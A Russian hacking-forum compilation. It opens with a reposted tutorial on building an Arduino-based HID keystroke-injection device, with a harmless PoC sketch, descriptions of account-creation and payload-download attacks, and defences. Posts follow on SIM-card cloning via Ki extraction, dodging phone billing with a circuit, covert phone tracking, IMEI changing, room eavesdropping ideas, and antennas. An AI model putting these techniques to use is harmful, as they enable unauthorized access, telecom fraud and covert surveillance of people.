Злой HID. Делаем и программируем хакерский девайс для HID-атак

Универсальность шины USB создает большую поверхность атаки. Исследователи из Университета Бен-Гуриона выделяют почти три десятка хакерских техник использования USB. В данной статье мы рассмотрим один из самых эффективных вариантов — автоматизированную отправку команд при помощи самодельного устройства класса HID.

HID-атаки
HID-атака — хитрая разновидность BadUSB. Ее суть сводится к тому, что в USB- порт вставляется простейший хакерский девайс, эмулирующий устройство ввода. Практически любая современная ОС поддерживает plug-n-play и содержит универсальный драйвер устройства каждого класса. Хакерский девайс автоматически определяется ОС как нужный нам Human Interface Device — HID. Далее ОС безо всяких проверок принимает его команды.

Есть много готовых девайсов для атак через USB-порт. Например, Rubber Ducky и ее разновидности. На мой взгляд, интереснее разобраться, как сделать такую штуку самому. Это довольно просто (когда знаешь как) и дешево. Нам даже флешка на этот раз не понадобится.

Преимуществ HID-атаки перед атакой вручную сразу несколько: это скорость, незаметность и автоматизация. Все необходимые действия выполнятся быстрее, чем ты сможешь набрать то же на клавиатуре, и без опечаток (если их не было изначально). Подключить к USB-порту миниатюрное устройство можно за пару секунд. Это не такое палево, как садиться за чужую клавиатуру и поминутно оглядываться через плечо. Из-за малых габаритов самодельный девайс легко спрятать и пронести через охрану даже на режимный объект. В крайнем случае можно просто выдать его за флешку и «случайно» уничтожить легким нажатием ботинка, после чего изготовить хоть мешок других таких же.

Выбираем аппаратную платформу
Сотворить такую хакерскую железку можно и на одноплатниках (вроде Raspberry Pi), но это все равно что перевозить ноутбук на фуре. Есть «братья меньшие» не такие известные, но не менее «злые» и опасные в руках из плеч. По сути, для выполнения HID-атаки нам необходим микроконтроллер, USB-порт и минимальная электронная обвязка, чтобы это все заработало.

Arduino Micro Pro
На мой взгляд, это один из идеальных кандидатов на роль хакерского девайса.
Arduino Micro Pro

Плата размером 33×16 мм работает на микроконтроллере ATmega32u4 и имеет на борту 28 Кбайт свободной памяти (вообще памяти 32 Кбайт, но 4 Кбайт уже заняты загрузчиком). С ней очень легко работать, так как проект Arduino хорошо поддерживается и для него написано много документации. Также для него есть готовая среда разработки Arduino IDE с дистрибутивами для Windows, Linux и macOS. Купить плату можно от 350 рублей.

Teensy Low Cost
Teensy LC

Хорошая альтернатива — семейство плат Teensy, совместимых с Arduino. С ними также можно использовать Arduino IDE. Например, плата Teensy LC размером 17×35 мм оснащена процессорным ядром ARM Cortex-M0+ и 64 Кбайт памяти. Купить ее в России может быть проблематично (основной упор делается на продажи Teensy 3.2–3.6), но заказать из-за рубежа вполне возможно. Цены на Teensy LC начинаются от 10 долларов.

Digispark
Многие думают, что Digispark — это самая подходящая плата для HID-атак. Да, она выигрывает по некоторым параметрам у остальных: крошечный размер 18×22 мм, практически нет лишних функций (и точек отказа), USB-разъем типа А и смешная цена порядка 100–150 рублей.

Однако в использовании она не так проста. Даже подключать ее стоит в порт USB 2.0 (или через USB-хаб v.2.0) либо лезть в BIOS, отключать xHCI и выставлять режим USB 3.0 порта как USB 2.0 compatible. Обратная совместимость у версий USB 3.0 и 2.0 заявлена, но порой нужен бубен, чтобы она реально заработала, особенно на Windows 10.
Digispark

Работает данная плата под управлением микроконтроллера Attiny85. С памятью у нее негусто — всего 8 Кбайт, из которых два уже заняты загрузчиком. Совсем не вдохновляет ограничение ROM в 512 байт под исполняемый код, но оптимизация тебе в помощь.

Процессор (если его можно так назвать) опять же совместим с Arduino IDE, только желательно использовать версию 1.6.5r2, а 1.6.6 и 1.6.7 не рекомендуется вовсе. Digispark Wiki любезно предоставляет мануал по «вживлению» этой платы в Arduino IDE, или можно скачать уже специально заточенные версии ПО.

Альтернативы
Выше я привел для примера три платы, которые, на мой взгляд, идеально подходят для HID-атак, но под конкретную задачу может быть интереснее взять какую-то другую. Вот еще примеры плат и некоторые соображения, почему они были отвергнуты в качестве универсального варианта.

NodeMCU и SparkFun с микроконтроллером ESP8266. Этот чип разрабатывался с направлением на поддержку Wi-Fi, поэтому платы с беспроводным модулем получились довольно большими. NodeMCU имеет размер 60×30 мм при не самой выгодной цене от 400 рублей. Однако если планируется многоэтапная атака, то беспроводное подключение будет совсем не лишним.

SparkFun в целом неплох, но смущает ценой (от 17 долларов за копеечный процессор). Однако его контроллер совместим с Arduino IDE, что делает разработку удобной.

Функционально Particle Photon похож на платы с ESP8266, но его цена гораздо выше. На борту у него довольно дорогой и ненужный для HID-атак ARM Cortex M3 STM32F205RGY6 с Wi-Fi-модулем Broadcom BCM43362, что поднимает цену до 2000 рублей и выше. Он будет оправдан в том случае, если помимо эмуляции клавиатуры планируется выполнять какие-то более сложные задачи, требующие универсального процессора архитектуры ARM.

Обрати внимание, что из всех рассмотренных плат лишь Digispark оснащен USB- портом типа А. Остальные имеют разъемы micro-USB и mini-USB, поэтому советую сразу обзавестись OTG-адаптером на интерфейс платы или кабелем для подключения нашего хакерского девайса к компу.

Click to expand...

Делаем хакерский девайс за пять долларов
Приступим к практической части на примере платы Arduino micro Pro и переходника mini-USB ↔ USB Type A. В качестве основной ОС используется Kali Linux (4.14.0-kali3-amd64), но на других сборках Linux и в Windows проблем возникнуть не должно. Arduino IDE v. 1.8.6 скачана с официального сайта. В качестве жертвы выбран тот же компьютер.

Готовим софт
Скачиваем дистрибутив, распаковываем. В каталоге лежит файл с символичным названием install.sh. Его и запустим на исполнение:
./install.sh
Минуту-две смотрим на надпись Adding desktop shortcut, menu item and file associations for Arduino IDE… и вуаля! На рабочем столе появляется ярлык для запуска.

Теперь подключаем нашу плату. Весь нужный софт установился вместе с IDE, поэтому нет необходимости что-то доустанавливать, монтировать и запускать.

Командой lsusb можно проверить, что устройство определено верно и все идет по плану (Arduino Micro Pro определяется как Leonardo).
lsusb

Следующая команда покажет порт, на котором повис наш Leonardo:
ls /dev/ | grep tty
У меня это ttyACM0.
ls /dev/ | grep tty
[](https://xakep.ru/wp- content/uploads/2018/09/186977/5.png#26847265)

Теперь можно открыть саму IDE. Сразу после запуска идем в меню «Инструменты» и в разделе «Платы» выбираем Arduino Leonardo. Там же в «Инструментах» выбираем нужный порт (он там, скорее всего, будет один) из списка tty.

После этих действий связь платы с компьютером установлена, программное обеспечение настроено, можно переходить к написанию скетча (так называют код для Arduino-совместимых макетных плат).

После запуска Arduino IDE картинка будет следующая.

Интерфейс Arduino IDE

Есть еще один вариант запустить подобие Arduino IDE. На сайте представлен Arduino Web Editor. На мой взгляд, он менее удобен, но тут уже кому как по вкусу. Для его использования будет необходимо зарегистрироваться на сайте либо авторизоваться через Google- аккаунт. Также для связи браузера с устройством потребуется установить плагин (он есть для Chrome и Firefox). Его удобство в том, что все написанные скетчи будут онлайн (с любой точки земли можно получить доступ к ним), но я в таких тонких деталях предпочитаю локальную работу.

Интерфейс Arduino Web Editor

В остальном редакторы похожи.

Изначально присутствует заготовка из void setup() и void loop(). Напомню, что код, написанный в функции setup(), будет исполняться сразу при подаче питания на плату, причем он исполнится один раз. Функция loop() отреагирует на питание таким же образом, вот только повторяться действие будет постоянно (цикл с бесконечным счетчиком и неизменным кодом на каждый проход).

Пишем скетч
Нам нужно, чтобы микроплата Arduino выдавала себя за клавиатуру. Для этого в самом начале следует добавить библиотеку Keyboard.h.

Далее основные элементы, которыми мы будем пользоваться:

• Keyboard.begin() — строка необходима для начала эмуляции клавиатуры;
• Keyboard.print() — вводит заданный текст;
• Keyboard.press() — зажимает указанную клавишу;
• Keyboard.release() — отпускает указанную клавишу;
• Keyboard.releaseAll() — отпускает все клавиши;
• delay() — задает период ожидания (между командами или для начала выполнения действия).

Ключи нажимаемых клавиш можно найти тут. Для простоты мы говорим «нажимаем/отпускаем клавишу», подразумевая, что контроллер отправляет ее скан-код, имитируя нажатие командами Keyboard.press/Keyboard.release.

Каждый, кто немного касался программирования, знает о том, как работать с повторяющимися вызовами. Если мы начинаем копипастить участки кода, то пора вызывать парней в белых халатах. Поэтому повторения будем выполнять с помощью отдельной функции.

Задается она вот такой конструкцией:
void function_name(){ ... }
В скетче указывается как function_name(). Для начала другие элементы управления платой нам не понадобятся.

Теперь можно попробовать написать свой первый скетч. Ведь в теории между теорией и практикой разницы нет, а на практике — есть.

В качестве PoC используем такую задачу: после подключения нашего девайса в USB-порт на компе с Linux должен автоматически открыться терминал, а затем в домашнем каталоге создаться файл с содержимым Hello World, который открывается в текстовом редакторе (у меня будет Leafpad).

Скетч выглядит следующим образом.

Код задания

В самом начале указана знакомая всем сишникам конструкция #include c указанием на использование библиотеки Keyboard.h. Как уже говорилось выше, она нужна для того, чтобы наша ардуина смогла выдать себя за клавиатуру.

В коде повторяется нажатие клавиши Enter три раза, поэтому удобнее создать отдельную функцию pressEnter(), что я и сделал. Обрати внимание: она находится за пределами setup(), а между нажатиями клавиши Enter вставлена задержка (ниже поясню, зачем она нужна).
Keyboard.press(KEY_RETURN); delay(50); Keyboard.release(KEY_RETURN);
Далее идет основная функция void setup().

Code:Copy to clipboard

Keyboard.begin(); // Начало эмуляции клавиатуры
delay(5000); // Задержка 5000 мс
Keyboard.press(KEY_LEFT_GUI); // Нажимаем клавишу «Пуск»
delay(5000);
Keyboard.release(KEY_LEFT_GUI); // Отпускаем ее
delay(500);
Keyboard.print("terminal"); // Пишем в поиске
delay(500);
pressEnter();
delay(1000);
Keyboard.print("echo Hello World >> test"); // На этом моменте терминал уже открыт
delay(50);
pressEnter();
delay(1000);
Keyboard.print("leafpad test"); // Открываем файл test в Leafpad
delay(50);
pressEnter();

Сложно? Пока нет, но станет сложнее, когда вместо Hello World ты запишешь в файл код зловреда и запустишь его на исполнение.

Поясню выставление пауз: тут нужен трепетный подход, потому как ОС может не успеть отреагировать на команды. Допустим, ты не выставил паузу и подключил свою ардуину. Она начинает выполнять записанные действия еще до того, как операционная система поймет, что это за устройство, и подключит его как клавиатуру. То есть половина команд просто уйдет в никуда, и нужного результата мы не получим. Такая же история между нажатием клавиш и набором текста. Нашей жертве (компу) необходимо давать время, иначе она не поймет, чего от нее вообще хотят.

Есть еще один важный нюанс с раскладкой клавиатуры. Мы написали код, ориентированный на английскую раскладку. Если в момент подключения нашего устройства к атакуемому компьютеру раскладка будет не та, под которую писался скетч, то нужного нам действия не получится. Горячие и функциональные клавиши, конечно, отреагируют как надо, а вот с набором текста возникнут проблемы. Вместо «terminal» получится «еукьштфд», со всеми вытекающими последствиями.

Примеры атак
При проведении реальных HID-атак можно начать с быстрого создания локального пользователя. Демонстрирую это на примере Windows 10 сборки 1607.

Создаем пользователя

Согласись — удобно. Незаметно вставил микроардуину в USB-порт чужого компа, и через несколько секунд на нем уже появилась локальная учетка с заданными тобой параметрами логин/пароль.

Глянем чуть глубже и немного усложним. Подготовим FTP-сервер и загрузим на него боевую нагрузку. И вот так будет выглядеть загрузка файла и его запуск. Благодаря самой загрузке это займет чуть больше времени, но, к примеру, админская сессия того стоит.

Загружаем файл с FTP

Поясню момент с файлом: да, можно выполнить все команды вводом, но суть опять в тайм-ауте исполнения. Мы не знаем, как долго может сервер реагировать на команды (на это влияет скорость интернет-соединения, скорость работы самого компьютера и еще куча разных факторов). Также стоит учесть то, что ты можешь использовать в своих тестах SSD (и все вроде бы работает), но при подключении к компьютеру с HDD… думаю, ты уловил смысл.

Наверняка ты обращал внимание, что USB-клавиатура определяется BIOS еще до загрузки ОС. В UEFI вообще интегрирована расширенная поддержка USB-портов разных версий с готовыми профилями для HID-девайсов и USB-накопителей. Большой объем флеш-памяти современных материнок и унифицированная структура UEFI позволяют загрузить низкоуровневый бэкдор, просто вставив копеечный хакерский девайс из ардуины.

Как защититься от HID-атак
Как мне кажется, самый надежный способ защиты для любой ОС — блокировать учетную запись (паролем, RFID-чипом или биометрическим сканером), когда уходишь из-за компа. Фишка атаки в беспалевности и скорости, поэтому вряд ли пентестер будет вставлять такую штуку в заблокированный компьютер (хотя в некоторых довольно крупных организациях девочки из бухгалтерии практикуют не блокировку компьютера, а выключение монитора. Как ты понимаешь, это не подойдет). Также можно совсем отключить незанятые USB-порты (в BIOS или физически), но что помешает атакующему вытащить легитимную клаву и подключить вместо нее эмулятор на ардуине? Только настройки политики безопасности и сторонний софт для контроля подключений по USB.

Что касается ОС Windows, то тут есть несколько решений. Во-первых, комплексные антивирусы. Они уже научились определять класс BadUSB и блокировать такие устройства. К примеру, в серверной части «Антивируса Касперского» при настройке политик безопасности есть функция «Защита от атак BadUSB».

Настройка политики безопасности с сервера управления Kaspersky

Во-вторых, есть средства борьбы с подобного рода атаками при помощи групповых политик. Необходимо открыть gpedit.msc, пройти цепочку «Конфигурация компьютера → Административные шаблоны → Система → Ограничения на установку устройств». В этом разделе есть несколько правил. Нам нужно «Запретить установку устройств, не описанных другими параметрами политики». Суть правила заключается в том, что при его включении драйвер нового устройства не будет автоматически установлен, если только этот девайс прямо не указан в политиках. Есть, конечно, небольшое неудобство в данном методе, но если все грамотно настроить, то проблем не будет.

Настройка правил групповой политики Windows 10

В своих исследованиях защиты от HID-атак я использовал в качестве жертвы комп с Windows 10 (1607). В первом случае антивирь Касперского сработал на ура. Во втором ОС сама заблокировала мое устройство. Правда, когда я попытался подключить вторую клавиатуру к компьютеру, тоже получил отказ.

Для Linux можно воспользоваться udev и его правилами. Необходимо создать файл /etc/udev/rules.d/10-usbblock.rules и вписать в него следующее содержимое (классы можно блокировать любые):
`#ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0

/sys$DEVPATH/../authorized'" Теперь можно заблокировать добавление новых HID-устройств командой sed -i 's/#//' /etc/udev/rules.d/10-usbblock.rules; udevadm control --reload- rules А вот команда для разблокировки: sed -i 's/^/#/' /etc/udev/rules.d/10-usbblock.rules; udevadm control --reload-rules`

Заключение
Эмуляция клавиатуры — опасный инструмент в умелых руках. Это было наглядно продемонстрировано еще в 2014 году на Black Hat. Доклад [Building Trojan Hardware at Home](http://www.blackhat.com/docs/asia-14/materials/Dunning/Asia-14-Dunning- Building-Trojan-Hardware-At-Home.pdf)вызвал всплеск интереса к данной теме.

Изначально в серьезность угрозы верилось с трудом, а в Сети циркулировали шуточки на тему USBola, сравнивающие эту атаку с известным вирусом. После публикации статьи Computer Ebola шутки закончились. Вдобавок Карстен Нол подлил масла в огонь, создав список уязвимых устройств, которые удобно использовать для проведения атак вида BadUSB.

За последние годы ситуация изменилась. С одной стороны, стало проще создавать копеечные эмуляторы клавиатуры, находить примеры готовых скетчей и пейлоадов. С другой — некоторые комплексные системы защиты научились распознавать хакерские HID-девайсы, а в современных ОС появились расширенные настройки политик безопасности, препятствующие их несанкционированному подключению.

автор Роман Вегелин, копипаст с хакер.ру

Народ! Помогите плиЗ кто чем могЁт.
Офис набит БаГсами а найти не можем.
Может кто подкинет схемку детектора всей эТой ереси(жучков ВсмЫсле) рабочИю ато мы прям запарились ужо.

Интересуют системы контроля доступом, например http://control-dostupa.ru/ или http://www.exsnet.ru/

Интересуют схемы и техническая документация. Возникла необходимость написать что-то подобное, более простое, но сохранив основные возможности.
Вдруг у кого-то что-то есть по теме?

З.Ы. Особенно интересно каким образом можно все это сделать самому.. Потратив минимум баблоса.

2недели назад нашел такую умную ерунду не знаю понравится или нет судить вам сылка вот http://slang.od.ua/dcp/
работает на 100% B) :punk: B) :punk: humbsup:

кто-нибудь когда нибудь паял усилитель? я не про сложную и длинную схему, а на интегральных микросхемах, типа как в магнитолах. я копался по инету, и остановил свой выбор на микросхеме TDA7269, но некоторые грят, мол Thompson - отстой. Мож кто подскажет, на чем проще будет сделать. только на выходе мне надо не меньше чем 35 Ватт на канал.

Всем привет!Скажите пожалуйста как открыть свою станцию.Что для этого нужно?И какие документы?И какя аппаратура.

Подскажите кто знает, как сделать такой приёмник?

А вообще бывают заводские приемники принимающие такие частоты?

Вот схема ИК порта для компа.

Вот программа которая работает с этим устройством
Вот ссылка с конфигурациями для ДУ, можно обучить прогу работать с любым пультом.

Пока ещё сам не сделал... когда сделаю отпишусь. в рабочем варианте видел.... прикольно

Ясень пень вначале надо голову надыбать, и которая думает и которая низкочастотная! А Дальше чего?

:help: :nukesign: Как взломать Домофон цифрал?

Хочется всегда звонить "в нутри сети"? Так в чем проблема!
Первый способ - для людей с прямыми руками:
Идем на любой радиорынок, там покупаем пререходник на две симки, обычно к нему прилагается инструкция как да чего. В кратце сим карточка - просто чип в который зашит твой Ki и IMSI(об них далее) и размеры рабочей части - площадь под контактами - остальная пластмасса нам не нужна, она отрезается(в комплекте есть лейкала.можно скальпелем), потом стачивается верхняя часть над контактами, вставляется две изготовленные симки в переходник и все готово. Неудобность этого способа - для переключения симок приходится выключать телефон и при втором включении он заводится на другой симе, что довольно таки долго. также можно запоганить симку.

Второй способ - для людей с прямыми руками и кривыми извилинами:
Опять же дуем на радио рынок, там мутим "болванку" сим карты, стоит порядка 5-10 бачей(эта таже симка, только пустая и подающеяся перезаписи). Мутим программатор, вот он стоит довольно таки недешего ~30(хотя все зависит от жадности продавца).Програматор - самая важная часть такчто предварительно как его покупать нужно удостоверится, что софт его узнает. Потом потрубуется софт sim_scan by ejan Kaljevic 2003, SIM_EMU_6.01, icprog.exe вобще софта море.
Далее все просто прогзой типа сим скан ищем Ki и IMSI симок которые мы будем писать в болванку. Ki - это тот номер по которому тебя узнает оператор, он лежит в зашифрованном виде и с ограниченным доступом, но проблем с его выдергиванием у новых прогз не возникает(единственное с некоторых симок у некоторых операторов так не получится - там новый метот прятанья и ничего работающего я так и не нашел. такая лажа с новыми симками мегафона)IMSI лежит в открытом виде, поэтому выдирается легко. Скан идет от ~2 часа. В описании програматора обычно написанно какую он поддерживает скорость, тобишь скорость работы с com портом, выбираем его в проге и еще некоторые симки не читаются на некоторых скоростях(методом перебора находишь свой, сначала попробуй самую медленную, но на ней ты можешь быстро убить симку, т.к. на некоторых стоит ограничение на количество обращений, при большей скорости по не известным мне причинам они медленее кончаюся)
Так сканим две(или более) симок, записываем полученные результаты.
Далее нужно в болванку симки залить прошиву, анпример прогзой SIM_EMU_6.01 или Woron_Scan(она и сканить по моему умеет). Прошивы обычно идут с ней. Смысл работы прошивы в том, чтобы твой чип научить эмулировать симку, а далее все зависит от прогзы которой льешь прошивку. т.е. можно выбирать номер при включении - в зависимости от набранного пина врубается один или другой номер.Или выбирать уже из нового пункта меню sim menu(не все трубы его поддерживают). Вобщем все прогзы похожи и разобратся в них не сложно.

В чем смысл?Ну например половина друзей билайн половина мтс, в зависимости от того кому звонишь врубаешь номер. Потом с помощью прогррамматора можно разблокировать сим карты как в сервис центре, менят забытие пины и паки.

Подскажите простенькую и недорогую схемку стробоскопа.

Ребят тема такая - нужно узнать местонахождение телефона по номеру( без уведомления владельца) подскажите варианты.

Переходим в shodan у меня стоит плагин для хрома так удобней кому надо тыц кли- кай

Смотрим видео тыц список роутеров, с которых можно слать\принимать.
Huawei B683-24 (европа, ру, канада, юса)
ASUS 4G-N12 (аналогично хуавею)
TP-LINK TL-MR6400(европа)
RB-MTX (преимущественно польша)
VIP4G + аналоги(канада, юса)
iRZ (ру)

© rewrite

Деньги за повременку не начисляются, пока вызываемый абонент не снимет трубку. Если заставить АТС думать, что трубка не снята, счет не придет. Чтобы это сделать, нужно на стороне вызываемого абонента удерживать напряжение в линии после снятия трубки таким, чтобы посылка сигналов индукторного вызова прекратилась.Смысл в том, что за прекращение индукторного вызова и включение счетчика отвечают разные реле в оборудовании станции, и первое реле срабатывает при более высоком напряжении, чем второе (сделано для того, чтобы второе не срабатывало ложно от индукторного сигнала). То есть вы звоните тому у кого стоит этот девайс и вам не начисляются деньги.
Стабилитрон на напряжение 22...26 вольт (подбираем на месте, постепенно увеличивая, до момента прекращения индукторного вызова). Можно прменить несколько последовательно включенных стабилитронов на меньшее напряжение. При использовании модема иногда может потребоваться запараллелить диоды моста конденсаторами по 0.1...1 uF. Диодный мост можно исключить, если использовать двунапрваленный стабилитрон (или пару включенных встречно), либо включать схему в соответствии с полярностью линии. Замечание: Фрик работает только на 60-вольтовых линиях. В некоторых местностях распостранились 5-вольтовые линии, на них этот трюк не сработает.

Схему кину на мыло кому надо.

не давна нашел такую классную штуку каиф поможет ну всем кто хочет от дохнуть

Интерестная идея портативное охлажение Пива

Самое главное — это элемент Пельтье. Для тех, кто в танке, объясняю — это такая пластина, при подачи на которую эл-ва одна ее сторона нагревается, зато другая — охлаждается.
нашел я это на http://www.nica.ru/~lexanson/03.06.2003/3
работает на 100% :holloween: :punk: humbsup:

Всем привет, есть способы смены ИМЕИ на процессорах МТК. Тут встал вопрос как сменить на процессоре snapdragon?
Телефон Xiaomi
Буду благодарен за помощь.

Похоже, опять не описанный в интернете способ )

Суть такая. На алюминии при контакте с кислородом из воздуха образуется оксидная пленка, которая - в некоторых случаях является диэлектриком, в некоторых способна проявлять нелинейные электрические свойства, как полупроводник.
Возьмем для примера два куска алюминиевой проволоки и смотаем их между собой, но не очень плотно чтобы не повредить тонкий оксидный слой - так чтобы получить антенну-диполь, нагруженную на вот этот слой оксида алюминия.
Облучая такой диполь радиосигналом, можно получать "отклик" от него как от полупроводника на второй гармонике - тот же принцип как в нелинейной локации.
При механическом воздействии на тонкий слой оксида - отраженный сигнал модулируется пропорционально интенсивности приложенных механических колебаний.

Эту гипотезу я проверил на настольном макете с использованием обычного ВЧ генератора и широкополосного приемника.

Если пофантазировать - сколько таких диполей находится внутри обычного помещения? Детали конструкции приборов, электропроводка, металлические части мебели и многое другое.
В теории, облучая помещение радиосигналом с высокой стабильностью частоты и фазы, можно заставить все эти элементы "звучать" на второй гармонике. Принимая сигнал и перенося "вниз" при помощи гетеродина, синхронного с генератором "подсветки" - можно выделить звук.
Подозреваю что качество будет очень низким, но цифровая обработка (не говоря про нейросети) творит чудеса.

По самым грубым оценкам чтобы прослушать помещение на расстоянии 50м с чувствительностью используемого приемника 0.5мкв, нужен передатчик мощностью около 50вт и антенной 5...6дБ. Что более чем реально.

У кого какие мысли на эту тему? Сразу скажу, прошу не путать этот способ с объемными резонаторами, про которые информации много.
Сам я плотно этим вопросом займусь чуть позже, сейчас занят другой темой, но пока собираю информацию т.к. считаю данное направление очень перспективным.

Начав работать с радиооборудованием — таким как SDRы, устройствами для перехвата WiFi и так далее — в наиболее просвещённых СВЧ-волнами головах - возникают идеи улучшить качество сигнала, дальность - используя другие, как они любят говорить - «более мощные» антенны.

Эта статья — о наиболее важных моментах, которые нужно учитывать при выборе антенны под вашу задачу. Простым языком и со множеством упрощений.

Если же эти строки читает человек, использовавший для своего просвещения что- то более жесткое чем СВЧ, и теперь хочет предметно поговорить про S-параметры, HFSS и поспорить кто круче Agilent vs. R&S — велком в личные сообщения, всегда буду рад )

Оглавление темы:
- это сообщение - теория. Что такое антенны и какие они бывают
- Обзор антенны для взлома WiFi (АX-2414Y)
- Обзор антенны TP-Link TL- ANT2409A
- Один из вариантов антенны для приема LTE/GSM в движении
- Обзор телескопической антенны с SMA разъемом (как в комплекте HackRF)

Итак, антенна — устройство для приема и передачи радиоволн. От ее правильного выбора — зависит эффективность работы всего изделия в целом.
Работу плохого приемника можно улучшить используя хорошую антенну, а вот улучшить «плохую» антенну — дорогой электроникой, как правило нельзя.
Поэтому, люди работающие с радиооборудованием — привыкли говорить: «лучший усилитель — хорошая антенна».

Самая простая антенна — называется ДИПОЛЬ: 2 металлических стержня, подключенные к соединительному кабелю:

Один из стержней — активный (вибратор) — он подключен к центральной жиле кабеля. Второй стержень — противовес, он подключен к оплетке кабеля, «заземлен».
Размеры диполя, как и любой другой антенны — зависят от частоты, на которую он рассчитан. Чем выше частота — тем меньше длина металлических стержней.

Диполь работает только в очень небольшом диапазоне частот, определяемом его длиной. Т.е. диполь, сделанный изначально для 900МГц, на частоте 2.4ГГц — работать не будет.

Есть набор некоторых основных параметров, таких как:
- рабочий диапазон частот
Антенны могут быть изготовлены для работы на какой-то одной частоте (как диполь), либо широкополосные — на несколько частот. Фактически, широкополосная антенна — это набор из нескольких диполей разных размеров, каждый из которых работает в своем диапазоне частот.

Примеры — узкополосные антенны , работающие в небольшом диапазоне относительно определенной частоты:
Диполи:

Штыревые антенны 1/4, коллинеарные антенны:

YAGI:

Квадраты, би-квадраты:

Это все были узкополосные антенны, т.е. те которые работают только в одном диапазоне частот. Такие антенны, будучи сделанными например для 2.4ГГц - на 5ГГц хорошо работать не будут! 1 частота = 1 антенна!

Примеры широкополосных антенн , способных эффективно работать на нескольких частотах

Логопериодические:

Дискоконусные, би-конусные:

Антенны такого типа могут работать сразу на нескольких частотах, но как правило - остальные характеристики у них хуже.

Следующий важный параметр - усиление (и связанный с ним — направленность)

Точкой отсчета для этого параметра является диполь. Усиление диполя — примерно 1дБ (дециБелл).

Представьте, что диполь излучает (и принимает) сигнал во все стороны, по кругу

• относительно себя. Примерно вот так (антенна в центре этого бублика):

Если сбоку от антенны поставить зеркало, отражатель — получается, что за зеркалом образуется область без излучения, а со стороны диполя — наоборот, излучение будет значительно больше, т.к. к собственному излучению антенны добавлен еще и отраженный сигнал.
Вот такой "колхоз" люди иногда собирают. Конечно, отражатель должен быть больше размером, минимум в 2 раза, но смысл я думаю понятен:

Таким образом, антенна приобрела направленные свойства, и ее усиление стало больше. Излучение от диполя с отражателем выглядит вот так:

Вот пример промышленной антенны, где в качестве активного элемента - двойной квадрат, а отражатель - сетка:

Отражатель может быть плоским, или вогнутым - «фокусирующим» излучение от антенны. Тут все очень похоже на оптику, например - вспомните как устроен отражатель у обычного фонарика или уличного прожектора.

Так работают антенны с рефлекторами и параболические . Всем известная «спутниковая тарелка» - это отражатель для диполя или набора из нескольких диполей (если нужно несколько рабочих диапазонов частот), который размещен в точке фокуса вогнутого зеркала.

Отражатель может быть сплошной из металла, или сетчатый. Сплошной, конечно - более эффективный.
Иногда, рефлекторы таких антенн обрезают для уменьшения габаритов. Это тоже параболическая антенна:

Усиление параболической антенны - прежде всего, зависит от размеров отражателя (зеркала). Чем больше отражатель - тем больше усиление.
Так же, в фокусе отражателя может находиться не диполь с усилением 1дБ, а какая-то более сложная конструкция (см ниже), тогда суммарное усиление может стать выше.
Вывод - к любой антенне можно добавить рефлектор той или иной формы, что позволит увеличить усиление и сделать диаграмму направленности более узкой.

Еще один способ увеличить усиление — соединить между собой несколько диполей. Каждый дает усиление 1дБ, и чем больше мы набираем одинаковых диполей — тем больше суммарное усиление антенны. Но при этом страдает ее диаграмма направленности — чем больше усиление у антенны, тем более узкой становится ее диаграмма направленности.
Так устроены антенны YAGI (см фото выше), и фазированные антенные решетки:

На фото - множество диполей, соединенные между собой + отражатель. Такая антенна обладает высоким усилением, и дает некоторые другие преимущества.

Фазированную решетку можно собрать и из широкополосных антенн, что увеличит суммарное усиление. Выглядит это примерно так:

Серые элементы конусной формы, по 8шт - это логопериодические антенны (закрытые корпусами), собранные в фазированную решетку.

Следующий параметр. Эффективность излучения.
Предположим, подключили источник сигнала мощностью 100Вт к антенне. Из этих 100Вт — в эфир излучили только 50, а другая половина — нагрела элементы антенны и передатчика. Это и есть эффективность излучения.
Представьте, автомобильную фару с мутным или грязным стеклом. Плохо светит? Конечно, ведь часть энергии рассеивается на грязном стекле, отражателе и так далее. В антеннах - все тоже самое.

Как правило, параметр "эффективность" - связан с размером антенны (тут совсем сильно упростил). Это самая сложная для понимания величина. Т.к. статья — не «академическая», а скорее обзорная — предлагаю остановиться на факте, что эффективно излучать сигнал могут антенны, состоящие из диполей, каждый из которых имеет размер не меньше чем ½ длины волны.
Для частоты 900МГц — длина эффективной антенны, имеющее усиление 1дБ — не может быть меньше 16 сантиметров.
Частота 2.4ГГц — длина 6 сантиметров
Частота 5ГГц — 3см.
Соответственно — антенна с усилением 2дБ, будет иметь размеры уже как минимум в 2 раза больше, и так далее…
Тут не произойдет чуда, как бы этого не хотелось производителям антенн, порой продающих антенны размером с ладонь, якобы обладающих усилением в 10 и даже 20дБ.

Простыми методами эффективность излучения антенны не померить. Это делается специальным оборудованием, размещаемым в экранированных помещениях (безэховые камеры)

"пирамидки" на стенах комнаты - поглощают радиоволны, не дают им отражаться - что делает измерения очень точными.

Когда мы устанавливаем антенну на устройство, добавляетсяеще один параметр — поляризация.
Антенна (диполь) излучает сигнал в той плоскости, в которой он установлен. Если приемная антенна будет развернута на 90 градусов — сигнал она не примет.

В радиотехнике принято использовать термины вертикальная или горизонтальная поляризация (есть еще круговые и т.д., но это уже специфические темы).
Для простых антенн - поляризация определяется методом установки антенны. Вертикально поставили штырь или диполь - поляризация вертикальная. Горизонтально - горизонтальная.

Сотовая связь — из-за специальной конструкции антенны базовой станции, работает с любым видом поляризации, не имеет значения как устанавливать антенну телефона.

WiFi - все зависит от того, как у пользователя размещен роутер. Поэтому подбирать поляризацию, наклоняя антенну подключенную к «альфе» - придется опытным путем, руководствуясь уровнем принимаемого сигнала.

Механические свойства антенн.
Тип разъема.

Скорее всего, в своей практике — Вы столкнетесь с антеннами, имеющими разъемы SMA, или RP-SMA. Это довольно коварный стандарт, который очень похож внешне, можно даже ошибочно перепутать эти разъемы прикрутив RPSMA-антенну в SMA разъем, но работать при этом ничего не будет.
Отличие заключается в центральном контакте, обязательно проверяйте RP или обычный, не путайте «маму» с «папой» ! Ошибка в выборе разъема — равнозначна включению устройства без антенны, а значит может привести к выходу из строя передатчика.

Особое внимание - на пипку! Центральный контакт, он разный.
Почти во всех антеннах для WiFi - используется разъем RPSMA. В остальных, включая GSM - разъем SMA.
Но, каждый раз - нужно проверять этот момент, бывает что сами производители или продавцы, путают.

Переходники с одного стандарта на другой — использовать допустимо, но следует учитывать, что каждый дополнительный переходник вносит свои потери, и на частотах более 1ГГц они могут быть довольно существенными. Переходники в виде удлинителей-проводов, не желательны, т.к. вносят дополнительные потери на проводе.
Предпочтительные типы переходников:

А вот такие переходники, использовать крайне нежелательно :

